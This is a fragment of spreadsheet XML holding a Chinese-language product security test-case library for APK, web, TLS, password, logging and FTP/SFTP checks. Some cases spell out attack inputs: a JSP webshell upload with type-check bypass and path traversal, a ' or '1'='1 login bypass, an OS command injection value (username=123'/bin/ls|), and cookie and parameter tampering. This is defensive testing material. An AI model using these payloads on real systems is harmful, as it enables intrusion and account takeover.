2、在产品设计文档里列出了产品收集和处理个人数据的场景、个人数据类型、处理方法、收集目的、个人数据的保护措施以及数据存留期等</t>
  </si>
  <si>
    <t>1、检查产品或服务是否允许收集隐私声明中没有列出的个人数据，或将个人数据用于没有声明的目的
2、检查个人数据的采集范围、使用目是否与隐私声明中的描述保持一致</t>
  </si>
  <si>
    <t>1、首次启动应用，对应用进行核心和基本功能遍历
2、退出应用（不可点击home键退出，通过应用自带的退出菜单退出）
3、通过ps命令检查应用是否真正退出应用（如果应用进程还在，则说明未真正退出，应用在后台常驻），如真正退出则测试结束。如未真正退出则执行第四步
4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台删除短信/彩信记录行为</t>
  </si>
  <si>
    <t>1、自动更新/wifi下更新默认不勾选。如果默认勾选，需要提前给用户明示
2、更新通知对于用户要可知可控，不可强制升级，也不可强制要求用户点击更新（比如不更新就直接退出应用）</t>
  </si>
  <si>
    <t>1、wlan网络和数据网络未开启
2、GPS开关未开启
2、应用包含用户协议界面</t>
  </si>
  <si>
    <t>1、面向最终用户/消费类的产品，默认开启远程登录功能时，首次登录强制用户修改口令
2、面向最终用户/消费类的产品，没有默认开启远程登录功能时，修改默认口令后才能开启</t>
  </si>
  <si>
    <t>1、检查系统的详细设计文档，是否使用到随机数的生成函数。如果有，检查是否符合如下规则：
（1）OpenSSL库使用RAND_bytes生成随机数。
（2）中软iPSI组件使用CRYPT_random生成随机数。
（3）Java中使用类java.security.SecureRandom来生成随机数。
（4）Windows平台使用CryptGenRandom来生成随机数。
（5）Unix、Linux平台从名为/dev/random或者/dev/urandom的设备中读取得到随机数。
（6）VxWorks平台使用CCI组件的cciRand()函数生成随机数。
（7）禁止使用C标准库函数random()、rand()生成随机数用于安全用途。
（8）禁止使用Java的java.util.Random类生成随机数用于安全用途。</t>
  </si>
  <si>
    <t>人工测试：
1、在涉及输入密码的界面，查看弹出的键盘是否为应用的软键盘，而不是系统原生键盘，涉及的场景：
（1）注册、登陆、修改密码
（2）绑定第三方SNS、IM帐号</t>
  </si>
  <si>
    <t>1、在注册、登录、设置密码的页面，输入密码，包含小写字母、大写字母、数字、特殊字符，其中特殊字符为`~!@#$%^&amp;*()-_=+\|[{}];:'",&lt;.&gt;/?
2、输入如下类型的密码：
（1）仅包含上述一种字符
（2）包含上述两种字符
（3）包含上述三种字符或全部包含
（4）口令和帐号或者帐号的倒写一样</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用RSA算法进行签名。</t>
  </si>
  <si>
    <t>敏感数据在日志文件应该加密或掩码处理。
敏感数据：口令、共享密钥、私钥、终端用户数据（如：地址、单位、年龄、通信内容）
检查点：日志文件。</t>
  </si>
  <si>
    <t>1、获取被测应用源代码
2、按照总结的搜索关键字字典和华为密码字典，逐个搜索和检查代码</t>
  </si>
  <si>
    <t>1、未经数据主体同意，数据控制者不允许私自收集其个人数据（如MSIDN、IMSI、IMEI、URL HOST、URI等）
2、采集的个人数据在隐私声明里说明或是在收集之前通过弹出框告知
3、向数据主体提供授权、撤销授权的机制</t>
  </si>
  <si>
    <t>1、系统运行正常
2、获取产品相关应用场景文档</t>
  </si>
  <si>
    <t>1、找出一些重要的class文件（比如：加解密或涉及重要知识产权的业务核心代码）。
2、将class文件及工具jad.exe放入同一目录，例如：c:\classes。
3、进入windows命令行控制台。
4、输入命令cd /d c:\classes，进入放置class文件的目录。
4、执行jad.exe *.class，尝试反编译class文件。
5、观察在目录中输出的文件。</t>
  </si>
  <si>
    <t>1.主密钥不直接用来加密敏感数据，而是随机生成一个工作密钥用来加密敏感数据，而用主密钥加密工作密钥；解密时，先用主密钥解密得到工作密钥，再用工作密钥解密得到敏感数据。
备注：如果应用中仅有单一种类的、少量的敏感信息需要加密，可以使用根密钥直接加密。</t>
  </si>
  <si>
    <t>用于加密通过非信任网络传输的数据的密钥，不能在程序中硬编码，应提供密钥管理或密钥协商的机制：
1.检查是否存在用于加密的密钥是否提供密钥管理的机制或密钥协商的机制。
2.使用命令行验证密钥的管理机制或密钥协商机制。
3.通过Source Insight搜索代码，例如：搜索VOS_Cmp函数,在搜索结果中查看有无密钥的硬编码。
4.传输加密密钥不能硬编码在代码中，需要提供密钥管理的机制或密钥协商的机制。
备注：这里的密钥对应的是对称加密的密钥。非对称加密算法的公钥没有安全问题。</t>
  </si>
  <si>
    <t>1、日志须是否进行分类管理
2、操作日志（业务日志）文件达到指定阈值后是否进行告警
3、日志的覆盖或删除操作是否记录管理日志</t>
  </si>
  <si>
    <t>问题1（一般）：未配置权限等级用户，登录获取了对应vty虚拟接口的权限设置vty接口5-14权限等级为3级（管理级）配置一个新用户，权限等级未配置，即0使用该用户登录设备，其具备了3级管理员对应的权限最小权限原则，未配置权限的人不应通过其他方式获得权限；同一个用户通过多次登录，可以获得不同vty对应不同权限，权限管理混乱。
问题2（一般）：AAA下通过命令行local-user user-name password irreversible-cipher password创建的本地用户默认允许接入所有用户类型，包括http、telnet、ssh、ftp等。而且没有提示安全风险，按最小权限原则，用户在未配置服务类型的情况下，不应具备ftp、telnet等所有服务，而应由管理员根据需要分配。
问题3（一般）：在radius认证时，如果radius服务器没有返回用户的权限信息，系统默认用户管理员级别以上的权限，违反最小权限限制原则。</t>
  </si>
  <si>
    <t>1、禁止使用特定的组合键（如：ctrl+D键）绕过认证（如：不用输入口令）直接进入系统
2、禁止使用特定的鼠标操作绕过认证（如：不用输入口令）直接进入系统
3、禁止通过连接特定的物理或逻辑端口绕过认证，直接进入系统
4、禁止通过特定的客户端绕过认证，直接进入系统
5、禁止通过特殊的URL绕过认证，直接进入系统</t>
  </si>
  <si>
    <t>问题1（一般）：1）登录网关web页面；2）查看页面中是否有替换证书的功能。测试结果为产品不支持证书替换功能，采用华为自签证书。
问题2（一般）：在客户资料中没有提及将FTP SERVER的SSL证书替换成客户自己的证书；
问题3（一般）：1）查看SSL私钥文件为server_key.pem私钥文件可以通过FTP方式导出；2）产品支持证书替换功能，但未在产品资料中提示风险，建议客户替换成自己的证书和公私钥对。</t>
  </si>
  <si>
    <t>1、传输、存储加密用途的工作密钥不允许硬编码在代码里，硬编码在代码里的密钥无法更新（版本更新不视为密钥更新的方法）
2、系统设计和功能里必须设计和支持密钥更新方法（密钥更新方式：手动更新、自动更新等），并规定密钥更新规则（在线更新、离线更新、更新时间等）</t>
  </si>
  <si>
    <t>1、TLS产生致命告警，并关闭链接
ContentType为0x15 Alert</t>
  </si>
  <si>
    <t>1、不按照“握手协议完整流程”的标准顺序向被测试设备发送报文，观察设备响应；
hello request消息除外</t>
  </si>
  <si>
    <t>should
为了保证PRF足够安全，它使用了两个哈希算法：在某种意义上，主要其中一个算法安全就能保证PRF的安全性 业界标准</t>
  </si>
  <si>
    <t>1、修改用户A和用户B的口令为相同口令。
2、访问后台数据库，查看用户A和用户B的口令字段的值是否相同。</t>
  </si>
  <si>
    <t>以最终用户帐号登录，访问修改口令的界面，为当前登录用户设置新口令。尝试设置以下口令：
ABCABCD
abcabcd
1234123
@#$%^&amp;*(只包含特殊字符的组合)</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.检查user表中的数据库账号及其应用场景，各个账户都必须是单用途的。如果有多个应用访问同一个mysql服务的应该为每个应用配置不同的账户。</t>
  </si>
  <si>
    <t>安全维护手册从解决方案角度提供业务日常安全维护方面的指导，包括安全补丁、安全配置、防病毒软件例行检查等，指导维护人员例行进行安全维护。。
主要内容：
1、从解决方案角度提供业务日常安全维护方面的指导，包括安全补丁、安全配置等，指导维护人员例行进行安全维护。
2、系统应该拥有一个文档化的列表，列出日志记录的事件类型以及记录详细程度。（可以在产品的日志参考文档中提供安全日志的说明）
3、在附录中提供帐户、服务、进程列表的内容或给出安全相关的参考文档清单</t>
  </si>
  <si>
    <t>1.检查系统设计文档或代码飞检/访谈：DWR每个方法对入参有没有进行校验
2.针对使用DWR功能的Web应用，运行其相关功能，使用burpsuite截取DWR交互消息，修改其中参数为异常值（比如修改为空，长度超长、包含中文字符，包含特殊字符$%%^^等），查看响应消息是否相应报错
3.使用DWRDigger调用DWR每个方法，其中参数为异常值（比如修改为空，长度超长、包含中文字符，包含特殊字符$%%^^等），查看响应消息是否相应报错</t>
  </si>
  <si>
    <t>1.系统运行正常
2.系统中存在URL重定向功能</t>
  </si>
  <si>
    <t>1、Web Service运行正常
2、已获取CODENOMIC工具</t>
  </si>
  <si>
    <t>1.经过分析，剔除误报内容，扫描报告中不存在因为程序异常而导致的信息泄露的漏洞。
2.手工测试中返回的页面中没有敏感信息。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.获取系统管理员信息。</t>
  </si>
  <si>
    <t>对于系统存在的文件上传的点（比如：报告上传、头像上传等）都应进行如下测试：
1.登陆网站并打开文件上传页面，点击“浏览”按钮，并选择本地的一个JSP文件（比如webshell），确认上传。
2.如果客户端脚本限制了上传文件的类型（比如允许gif文件），开启burpsuite，把hacker.jsp更名为hacker.gif，确认上传。在burpsuite拦截的HTTP请求数据中，将hacker.gif修改为hacker.jsp，再发送请求数据。
3.登陆后台服务器，用命令find / -name hacker.jsp查看hacker.jsp文件存放的路径。如果可以直接以Web方式访问，则构造访问的URL，并通过浏览器访问hacker.jsp，如果可以正常访问，则已经取得WebShell，测试结束。如果hacker.jsp无法通过web方式访问，例如hacker.jsp存放在/home/tmp/目录下，而/home/tomcat/webapps目录对应http://www.example.com/，则进行下一步。
4.重复1～3，在WebScarab拦截的HTTP请求数据中，将hacker.gif修改为../tomcat/webapps/hacker.jsp，再发送请求数据。
5.在浏览器地址栏输入http://www.example.com/hacker.jsp，访问该后门程序，取得WebShell，结束测试。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统的帐号，并存在对帐号操作的能力</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统中存在调用OS命令的界面</t>
  </si>
  <si>
    <t>1.登录系统在业务查询中， 插入一个单引号（ ' ）
2.并检查应用程序是否返回错误信息，是否提示XPATH语法错误。</t>
  </si>
  <si>
    <t>1、使用用户B登录系统，请求系统资源，如documentB.pdf，20120101.pdf（根据时间生成）等
2、使用WEB代理工具拦截请求消息，修改请求信息为用户A的资源，如修改为：documentA.pdf，或者20120102.pdf
3、接受修改后，发送请求消息，查看服务器响应信息。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知某下载页面URL（假设用户a下载配置文件http://www.exmaple.com/download/usera/config.xml）</t>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具拦截请求消息，并修改Cookie中的信息，如是否为管理员，用户名等，并发送至服务器。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.系统存在使用永久Cookie的情况
3.Cookie中保存了敏感信息</t>
  </si>
  <si>
    <t>1.登录系统；
2.逐个访问各功能菜单，查看URL或页面源文件（以hidden关键字，在源文件中查找隐藏域）是否包含用户标识、权限标识、商品价格、采用IP认证的IP等不允许客户端修改的信息；
3.尝试通过Web代理工具拦截并修改步骤2发现的不允许客户端修改的信息（比如：把用户标识改为其他用户，或者把商品价格改为低价格），然后提交给服务器；
4.查看后台数据库的相关数据，检查步骤3的篡改是否起作用。
注：咨询开发设计，会话中除Session以外的信息的用途，并尝试会话中除Session以外的所有信息。</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.被测试系统帐号已知，密码未知</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.在用户管理（或账号）界面，检查“操作员帐号长时间未使用自动锁定”可配置，并将锁定时间设置为3天或更短。
3.使用3天未使用的帐户登录系统，并检查结果。
注意：或修改系统时间为3天后</t>
  </si>
  <si>
    <t>系统提供管理员手动解锁功能并且能解锁成功，帐户解锁后可以登录系统
注：自动解锁时，不需要有些功能</t>
  </si>
  <si>
    <t>1.以某操作员帐号连续使用错误的口令登录，直到系统提示帐号或IP已被锁定；
2.等待锁定时长过后再以正确的帐号和口令登录。</t>
  </si>
  <si>
    <t>1.打开登录界面，存在验证码，点击刷新页面；
2.使用WEB代理工具拦截登录消息，例如，删除登录消息体中的“vcode=1234”或“checkcode=1234”，修改vcode值，并提交
3.检查界面上的验证码是否与修改的值相关</t>
  </si>
  <si>
    <t>1.使用GET方法请求资源时，系统要求提供认证信息；
2.使用WEB代理工具，拦截登录信息检查所请求资源的认证方式，如为BASIC验证方式，返回WWW-Authenticate: Basic要求认证，则再次请求时发送的用户名密码使用BASE64编码，易被破解。</t>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.Web系统采用了WebLogic容器
3.拥有Web服务器操作系统的帐号和口令
4.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>1.命令中的ASLR开关呈enabled状态
注：该开关打开，有可能对Linux性能产生比较明显的影响，可根据产品线实际情况进行核查，如开关打开已影响产品实际使用，可对该项不做要求。</t>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.产品线提供相应的安全资料</t>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：搜索结果为空
注：使用方法2时，如果查询出现大量文件，请分别查询各单目录下的情况，如执行如下命令：
find /etc -nogroup -print</t>
  </si>
  <si>
    <t>方法1：使用SecureCat工具扫描操作系统，确认检查项12.9 Find Un-owned Files and Directories (Scored)是否pass
方法2：
1.登陆被测系统，进入命令行模式
2.执行命令 find / -nouser -print</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面或者应用设置界面检查自动更新功能的勾选框
2、首次进入应用，查看是否有服务器推送过来的更新通知</t>
  </si>
  <si>
    <t>1、应用包含用户协议界面
2、应用的用户协议中有联网链接</t>
  </si>
  <si>
    <t>1、系统中所有账号的口令都没有硬编码在代码里，而是可以修改的
2、系统缺省口令不是硬编码而是保存在配置文件里</t>
  </si>
  <si>
    <t>1、对于面向最终用户/消费类的产品，查看产品文档，看是否默认开启远程登陆功能
2、如果默认开启，则使用默认账号口令登陆系统，看是否强制修改口令，才能操作设备
3、如果没有默认开启，则使用默认账号口令登陆系统，尝试开启远程登陆功能，检查是否提示需要修改默认口令后才能开启</t>
  </si>
  <si>
    <t>1、系统提示该帐号或IP已被锁定或者第N次的认证处理时间是第N-1次认证处理时间的两倍。
2、服务端锁定一个帐号后，在解锁之前，该帐号不能登录系统；
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>人工测试：
1、在涉及输入密码的界面，检查弹出的应用软键盘上各个按键的声音是否有区别</t>
  </si>
  <si>
    <t>1、修改口令失败并提示
2、错误失败次数超过3-10次时弹出验证码或者提示今天的修改次数已经用完，或者具备其它有效的防暴力破解措施
3、步骤4中的旧请求失效
注：普通情况下，该问题划分为中低级安全风险，在具有跨站脚本漏洞或者由客户端提交账号的产品中，该问题划分为高级安全风险</t>
  </si>
  <si>
    <t>访谈：
1、确认产品是否支持用户关闭复杂度检查机制。
2、如果支持，检查是否有相应的资料说明</t>
  </si>
  <si>
    <t>1.分析系统中所涉及的敏感数据
2.通过业务操作构造相关的敏感数据信息</t>
  </si>
  <si>
    <t>1.检查所有的日志信息。
2.排查日志记录文件中是否记录了密码(包括密文）、Session或其它登录凭证。
3.根据测试人员对产品的了解，自行总结key等信息。</t>
  </si>
  <si>
    <t>1、在服务器上取用一个与系统共享uid的apk（HelloJack_release.apk），路径见备注
2、安装该apk
3、点击确定</t>
  </si>
  <si>
    <t>1、已连接上现网
2、已root</t>
  </si>
  <si>
    <t>1、检查未经数据主体同意，数据控制者是否允许私自收集其个人数据（如MSIDN、IMSI、IMEI、URL HOST、URI等）
2、检查数据控制者采集的个人数据是否在隐私声明里说明或是在收集之前通过弹出框告知
3、检查数据控制者是否向数据主体提供授权、撤销授权的机制</t>
  </si>
  <si>
    <t>1、hacker服务器未收到GET请求。
2、有对XML解析器的输入做数据检验。</t>
  </si>
  <si>
    <t>1.检查目标表单是否有有效的token随机串；
2.检查目标表单是否有验证码；
3.检查目标是否核对了 Referer 来源；
4.检查网站根目录下 crossdomain.xml 的"allow-access-from domain" 是否是通配符。</t>
  </si>
  <si>
    <t>1.在系统的各类网元执行以下违背安全策略的行为，如认证失败、鉴权失败、日志操作（包括转储、导出、删除等）、密钥过期等。
2.查看系统的告警台（比如I2000），看看是否存在对应的告警。</t>
  </si>
  <si>
    <t>1.目标系统正常运行
2.查找单用户文件夹/文件</t>
  </si>
  <si>
    <t>问题1（致命）：1）配置一个本地用户，并且赋予FTP服务，并制定FTP路径为任何一个你想要将文件上传或者下载的路径；2）建立FTP连接，进行上传下载操作。上传下载你任何想上传下载的文件，比如说执行文件，病毒、用户文件，配置文件，任何机密文件（用户文件等）都行。请产品在修改的时候注意一下使用别的方式上传下载也一并修改 。安全威胁：不对文件进行任何限制,下载机密文件，上传病毒都OK，如果病毒运行成功，整个系统都被控制。建议：限制文件的类型，上传下载的目录，文件的大小，文件的内容。
问题2（严重）：1）SFTP用户没有限定home目录，可以访问home目录之外的文件，下载系统配置、密码文件等敏感信息。2）SFTP与NAG系统运行用户为同一用户nag，SFTP用户操作权限过大，可以进入操作目录任意上传下载删除文件，如果SFTP用户非法滥用权限，对系统会造成严重破坏。例如：1、可以下载passwd文件进行暴力破解；2、可以进入操作目录下，篡改运行脚本，修改系统运行逻辑；3、可以进入操作目录下，删除脚本，造成系统环境瘫痪。
问题3（一般）：omu登陆ftp，可看到除eCNS610之外的目录，且可下载属于root/root的文件。目录权限过大。还可以上传文件到eCNS610文件夹；也删除eCNS610文件夹中的部分文件。建议：限制ftp用户上传下载的目录，文件的大小，文件的内容。
问题4（一般）：1)上传系统文件、配置文件、补丁文件等都没有校验文件大小，上传较大文件时造成一直上传状态导致假死状态；2）可随意上传任何形式的配置文件；3）可上传任何形式的补丁文件。
问题5（一般）:1) 通过ftp连接BMC，ftp可以访问BMC的所有目录。2)查看BMC空间使用情况；3)可以看到，/data存在可剩余空间，确认该目录放在了imana相关的日志等内容。通过ftp上传文件，占用/data剩余空间。4）当提示不能再上传文件后，登陆imana，查看/data/share/oplog/imana_oplog日志，显示日志不再正常记录。释放磁盘空间后，BMC的日志也不能正常进行。5）关闭imana服务后，再重新开启，服务不能正常启动。问题扩展：1）ftp服务，可以访问修改BMC的任意目录，导致可利用ftp下载、上传任意文件夹下的文件，开启的权限过大。2）ftp文件上传，对上传文件无大小限制。参考建议：1）只在某特定的路径下，开启ftp访问权限。2）限制ftp上传文件的大小容量。3）ftp上传路径与imana日志路径，挂载在不同的磁盘分区下。
问题6（一般）：业务用户scu、bmp、bmpser、oracle可以登陆SFTP并访问应用目录及其他目录，尤其是可以访问根目录，权限过大，可能导致敏感文件或者信息泄露。可以下载passwd文件：bmp用户可以删除业务所依赖的oracle数据表空间。
问题7（一般）：使用紧急OM通道代理文件传输，下载配置文件到目标基站，未做相关限制可下载任意文件到基站中去。 经安全PC决策：该问题与宏站的问题相同，已经在安全PC汇报过。安全PC的要求是如下两点文件在下载后，需要满足以下两个条件a. 激活时做文件合法性校验。b. 下载文件到基站目录时，该文件不能有执行权限。这两点都已经做到。所以问题请正常走下去关闭。 但是测试人员认为：如果ICSL认可无线安全PC的结论，则可关闭此问题。n 结论：1. 基站保证下载文件的时候，文件大小能够做限制。2. 基站保证下载的时候，下载的模块不能够执行下载下来的文件，而只能由各功能对应模块读取/执行对应的文件（如配置模块去读取配置文件）。3. 各功能模块在读取/执行文件时，需要对文件的合法性进行校验。</t>
  </si>
  <si>
    <t>1、应在产品CPI资料中提示用户修改出厂时预置的缺省口令。
2、人机帐号使用缺省口令登录时，系统应提示用户修改缺省口令。
3、管理员重置用户口令（如：找回密码功能）后，用户登录系统时应被提示修改重置口令
4、如果产品调用开源第三方软件，且开源第三方软件无法实现提示用户修改口令的功能，应在产品资料里提醒用户更新口令
5、口令禁止硬编码在代码里，例如： 
   用于存放口令的变量在定义时被赋予口令（如：const char pwd[]="roygcbp";）
6、系统缺省口令禁止硬编码在代码中，可加密保存在配置文件中
常见错误：
1、口令是根据设备的SN号派生而来，并且密码不能修改
2、因为数据库连接口令以硬编码的形式固化在代码中，导致数据库的连接口令无法被修改（一旦修改数据库连接口令将导致应用程序无法正常连接数据库）</t>
  </si>
  <si>
    <t>1、服务器端发送了hello request消息给客户端
2、对客户端回应的hello消息进行拦截、丢弃，使其不对服务器端做出反应
3、观察TLS的响应</t>
  </si>
  <si>
    <t>should
记录层协议对于TLSPlaintext.length的大小进行了限制大小不超过2^14字节 业界标准</t>
  </si>
  <si>
    <t>1.PRF的实现按照标准来做
2.PRF的数据长度满足要求；</t>
  </si>
  <si>
    <t>1、打开wireshark工具开始抓包
2、使用SSL服务与设备交互
3、观察SSL握手过程报文是否certificate消息用于服务器发送自己的X.509证书给客户端
4、服务器端是否发送certificate_request消息请求客户端证书</t>
  </si>
  <si>
    <t>如果存在程序帐号，访问程序帐号修改口令的界面，为某程序帐号设置新口令。尝试设置以下口令：
ABCABCD
abcabcd
1234123
@#$%^&amp;*(只包含特殊字符的组合)
测试场景参见“程序帐号的口令长度测试”</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统存在AJAX实现功能</t>
  </si>
  <si>
    <t>1.启动SOAPUI工具
2.新建工程，导入WSDL文件
3.左侧将列出接口方法，点击需要测试的接口
4.编辑请求消息，将参数值构造为OS命令，如：username=123'/bin/ls|等
5.点击发送请求按钮，查看响应信息中是否返回OS命令执行结果</t>
  </si>
  <si>
    <t>测试思路：此用例旨在检查应用程序在使用后是否适当的释放资源，避免程序的挂死等现象。常见错误有未释放资源、逻辑错误导致的无法释放资源等。
实例一：C/C++问题
应用程序锁定一个文件的写功能，然后出现一个异常但是没有正常关闭和解锁文件。在开发者负责 C 、C++等存储管理的语言中出现的内存泄漏内存。当一个错误引起需要回避的正常逻辑流程循环时，已分配内存可能无法删除，于是便造成垃圾回收不知道可否回收这个内存的状况。
实例二：java类问题
在这个例子中，Connection 和 CallableStatement 都应该在 finally 代码区关闭。
public class AccountDAO {
… …
public void createAccount(AccountInfo acct)
throws AcctCreationException {
… …
try {
Connection conn = DAOFactory.getConnection();
CallableStatement calStmt = conn.prepareCall(…);
… …
308
calStmt.executeUpdate();
calStmt.close();
conn.close();
} catch (java.sql.SQLException e) {
throw AcctCreationException (...);
}
}
}</t>
  </si>
  <si>
    <t>测试思路：构造一个永远为true的语句，类似sql注入，下面为测试示例：
1.打开系统登录界面
2.在用户名与密码框中输入如下信息：Username:'or'1'='1，Password:'or'1'='1</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统使用XPATH技术实现应用</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知待测目标URL，假设为http://www.exmaple.com/page.xxx
3.待测目标存在参数输入，假设为name=value</t>
  </si>
  <si>
    <t>1.使用userA的身份登陆到Web应用
2.进入http://www.example.com/abc.jsp页面，提交数据
3.使用WEB代理工具拦截请求报文，更改请求报文中operator参数的值为userB，点击forward提交
4.观察服务器返回结果</t>
  </si>
  <si>
    <t>1.系统运行正常
2.系统某资源只能由用户A访问，用户B无法访问</t>
  </si>
  <si>
    <t>1.访问登录页面，输入正确的用户名和密码，点击提交后使用burpsuite拦截请求；
2.在拦截的请求中右键点击弹出菜单，选择“Send to Sequencer”，这时“Sequencer”标签高亮，点击“Sequencer”标签；
3.在“Cookie”这栏选择请求中的会话标识，点击“Start live capture”开始发送大量请求获取足够数量的会话标识符；
4.“Live capture”完毕后，点击“Analyze now”进行分析；
5.分析完毕后查看报告，查看随机性是否为“excellent”。</t>
  </si>
  <si>
    <t>1.以管理员帐号登录系统；
2.检查是否有会话管理相关的界面，能够查看到当前已成功建立用户会话的信息，包括用户名称、终端标识符（可选）、IP地址、会话创建的时间。</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.在用户管理（或账号）界面，检查“操作员帐号长时间未使用自动锁定”可配置，并将锁定时间设置为3天或更短，并导致帐户锁定。
3.帐户锁定后，修改系统时间为3天前或者2天前，重新登录系统。</t>
  </si>
  <si>
    <t>1.以某操作员帐号连续使用错误的口令登录，直到系统提示帐号或IP已被锁定；
2.以系统管理员登录系统，查看系统是否提供管理员手动解锁功能（包括帐号解锁或IP解锁）。
3.使用被锁定帐户重新登录系统</t>
  </si>
  <si>
    <t>1.访问带有验证码的页面；
2.右键点击页面的空白处，在弹出右键菜单中选择“查看源文件”；或者点击IE的“页面”--&gt;“查看源文件”
3.在页面源文件中搜索步骤1的验证码字符串；
备注：本部分测试用例主要是为了观察验证码的信息是否存在泄漏，请测试人员理解分析本产品所用验证码的原理，尝试设计验证码信息泄漏方面的用例。</t>
  </si>
  <si>
    <t>1.使用GET方法请求资源时，系统要求提供认证信息；
2.使用WEB代理工具，拦截登录信息检查所请求资源的认证方式，如为DIGEST验证方式，返回WWW-Authenticate: DIGEST要求认证，则再次请求时发送的用户名为明文。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知待测目标URL，假设为http://www.exmaple.com</t>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：输出结果为空</t>
  </si>
  <si>
    <t>方法1：使用SecureCat工具扫描操作系统，确认检查项12.10 Find Un-grouped Files and Directories (Scored)是否pass
方法2：
1.登陆被测系统，进入命令行模式
2.执行命令 find / -nogroup -print</t>
  </si>
  <si>
    <t>1.目标系统运行正常
2.日志记录正常</t>
  </si>
  <si>
    <t>日志记录应该对特殊应用与安全相关的日志进行记录，包括：
1.FTP/SFTP上传下载记录日志
2.IPSec通道建立时对端IP地址、身份信息记录日志</t>
  </si>
  <si>
    <t>红线 高 注：口令认证是最小的接入认证机制
    常见的非标准协议或者产品需要定制开发接口的管理端口和协议举例：MML、SOAP、HTTP/HTTPS、华为自研协议</t>
  </si>
  <si>
    <t>1、应用包含用户协议界面
2、应用的用户协议或者设置中有自动更新功能</t>
  </si>
  <si>
    <t>1.使用shell脚本或工具检查代码中是否存在密钥敏感字符串（key、sharekey、encrypt、enc、dec、decrypt等）。并结合开发人员人工访谈&amp;分析，确认初始密钥是否使用工具生成
2.使用IDA工具对安装文件进行反汇编或反编译，查找是否有密钥敏感字符串和硬编码的使用
3.根据场景分析可能会用到加密密钥的模块，重点走读这部分代码，检查其是否存在硬编码密钥</t>
  </si>
  <si>
    <t>1、产品环境可用，且处于初始状态
2、获取产品资料</t>
  </si>
  <si>
    <t>预置条件：
1、系统提供“连续登录失败锁定”功能；
测试步骤：
1、打开客户端程序，连续N次使用错误的口令登录，查看系统提示。（N&lt;10）。
备注：一般建议连续3次登录失败后锁定账号，产品可根据情况调整，一般不超过10次</t>
  </si>
  <si>
    <t>1、登录客户端
2、在修改口令页面，重复输入错误旧口令3-10次；
3、检查系统是否弹出验证码或其它防暴力破解措施（例如：设备重启，锁定，冻结一定时间）。
4、如果弹出验证码，重新发送没有验证码的码流，检查能否成功修改密码</t>
  </si>
  <si>
    <t>2、确认产品apk在测试报告中
3、对每条记录可以看出处理结论：对于误报问题，要有误报理由和跟安全组的确认记录；中级或者中级以上的非误报问题必须清零或者在网络安全部备案，且有备案记录；低级别的非误报问题要有整改计划</t>
  </si>
  <si>
    <t>检查应用程序产生的日志文件，查看是否存在明文的敏感数据（特别是密码）。
注：建议在做过大量功能测试的环境上检查。
Linux下使用find -name filename | grep “pass*”
      Windows下使用Search And Replace进行查找。
注：pass*代表要查找的具体敏感数据。</t>
  </si>
  <si>
    <t>1、在服务器上取用一个apk
2、在手机上安装该apk
3、篡改该apk后再次安装该apk到手机，检查是否能够成功安装</t>
  </si>
  <si>
    <t>2、提示系统相关的权限
3、安装失败</t>
  </si>
  <si>
    <t>1、打开应用，并联网使用
2、在adb shell 下执行 busybox netstat -a -p -t -u -l -w -e</t>
  </si>
  <si>
    <t>APK_SECR_010101_001</t>
  </si>
  <si>
    <t>APK_SECR_010101_002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_010103_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_010103_002</t>
  </si>
  <si>
    <t>APK_SECR_010103_003</t>
  </si>
  <si>
    <t>APK_SECR_010103_004</t>
  </si>
  <si>
    <t>APK_SECR_010103_005</t>
  </si>
  <si>
    <t>APK_SECR_010103_006</t>
  </si>
  <si>
    <t>APK_SECR_010103_007</t>
  </si>
  <si>
    <t>APK_SECR_010103_008</t>
  </si>
  <si>
    <t>APK_SECR_010103_009</t>
  </si>
  <si>
    <t>APK_SECR_010103_010</t>
  </si>
  <si>
    <t>APK_SECR_010103_011</t>
  </si>
  <si>
    <t>APK_SECR_010103_012</t>
  </si>
  <si>
    <t>APK_SECR_010104_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_010104_002</t>
  </si>
  <si>
    <t>APK_SECR_010104_003</t>
  </si>
  <si>
    <t>APK_SECR_010104_004</t>
  </si>
  <si>
    <t>APK_SECR_010104_005</t>
  </si>
  <si>
    <t>APK_SECR_010104_006</t>
  </si>
  <si>
    <t>APK_SECR_010105_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_010105_002</t>
  </si>
  <si>
    <t>APK_SECR_010105_003</t>
  </si>
  <si>
    <t>APK_SECR_010105_004</t>
  </si>
  <si>
    <t>APK_SECR_010105_005</t>
  </si>
  <si>
    <t>APK_SECR_010105_006</t>
  </si>
  <si>
    <t>APK_SECR_010105_007</t>
  </si>
  <si>
    <t>APK_SECR_010105_008</t>
  </si>
  <si>
    <t>APK_SECR_010105_009</t>
  </si>
  <si>
    <t>APK_SECR_010105_010</t>
  </si>
  <si>
    <t>APK_SECR_010105_011</t>
  </si>
  <si>
    <t>APK_SECR_010105_012</t>
  </si>
  <si>
